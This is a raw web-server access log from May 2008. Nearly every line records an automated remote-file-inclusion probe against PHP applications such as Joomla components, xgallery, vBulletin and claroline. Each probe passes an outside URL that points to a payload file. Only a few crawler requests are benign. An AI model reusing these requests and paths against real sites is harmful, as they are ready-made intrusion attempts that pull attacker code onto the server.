80.67.24.145 - - [29/May/2008:11:22:22 -0700] "GET /logs//photo_comment.php?toroot=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [29/May/2008:11:22:22 -0700] "GET //photo_comment.php?toroot=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:22:24 -0700] "GET /logs/scripts.log/shop.pl/page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:22:25 -0700] "GET /shop.pl/page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:22:25 -0700] "GET /logs/shop.pl/page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:11:22:47 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:11:22:47 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.67.24.145 - - [29/May/2008:11:22:53 -0700] "GET /logs/access.log//photo_comment.php?toroot=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:23:01 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:23:04 -0700] "GET /page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:11:23:04 -0700] "GET /logs/index.php?body=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:23:06 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:11:23:07 -0700] "GET /index.php?body=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:23:07 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:11:23:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:11:23:53 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:11:24:28 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:24:29 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:24:30 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:24:33 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:25:19 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:25:19 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:11:25:21 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:25:21 -0700] "GET /logs/page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:25:22 -0700] "GET /page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:25:51 -0700] "GET /logs/show.php?page=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:25:52 -0700] "GET /show.php?page=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:26:17 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:26:17 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:26:18 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:26:29 -0700] "GET /logs/index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:26:30 -0700] "GET /index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:27:56 -0700] "GET /logs/access_080330.log/page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:28:22 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:28:48 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:28:51 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:28:51 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:28:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:29:03 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:30:23 -0700] "GET /logs/access_080103.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:30:23 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:30:23 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:11:30:24 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:30:34 -0700] "GET /logs/show.php?page=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:30:34 -0700] "GET /show.php?page=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:11:30:36 -0700] "GET /logs//errors.php?error=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:11:30:45 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:11:30:49 -0700] "GET /index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:11:30:49 -0700] "GET /logs/index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:11:30:53 -0700] "GET /logs/access_080327.log//claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:11:30:59 -0700] "GET /logs/access_080327.log//claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:31:13 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:31:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:31:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:11:31:17 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:11:31:19 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:11:31:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.137.42.35 - - [29/May/2008:11:31:34 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [29/May/2008:11:31:43 -0700] "GET /logs/access_080327.log//admin/index.php?loadadminpage=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [29/May/2008:11:31:43 -0700] "GET //admin/index.php?loadadminpage=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [29/May/2008:11:31:44 -0700] "GET /logs//admin/index.php?loadadminpage=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:31:49 -0700] "GET /logs/access_080106.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:31:53 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.79 - - [29/May/2008:11:31:57 -0700] "GET /minamijewelry/html/images/jewelry/dream.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "www.dmulk.com"
74.6.18.120 - - [29/May/2008:11:32:03 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.52.27 - - [29/May/2008:11:32:06 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:32:34 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:32:40 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:32:40 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:11:32:47 -0700] "GET /logs/access_080303.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [29/May/2008:11:32:53 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [29/May/2008:11:32:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [29/May/2008:11:32:53 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:11:32:54 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [29/May/2008:11:33:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:11:33:03 -0700] "GET /logs/access_080309.log/index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.59.147.59 - - [29/May/2008:11:33:17 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.59.147.59 - - [29/May/2008:11:33:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.59.147.59 - - [29/May/2008:11:33:17 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:34:35 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:34:53 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:34:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:34:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [29/May/2008:11:35:32 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
59.106.19.213 - - [29/May/2008:11:36:12 -0700] "GET /logs/access_080217.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [29/May/2008:11:36:12 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [29/May/2008:11:36:13 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:36:13 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:36:15 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:36:15 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.19.213 - - [29/May/2008:11:36:16 -0700] "GET /logs/access_080209.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:36:16 -0700] "GET /logs//learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:36:16 -0700] "GET //learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:11:36:18 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:21 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:21 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:22 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:36:22 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:36:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:36:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:36:28 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:36:29 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:36:30 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:36:33 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:36:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:36:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:11:36:40 -0700] "GET /logs/access_080327.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:36:48 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:36:48 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:36:49 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:36:55 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:36:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:36:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:01 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:01 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:01 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:11:37:02 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
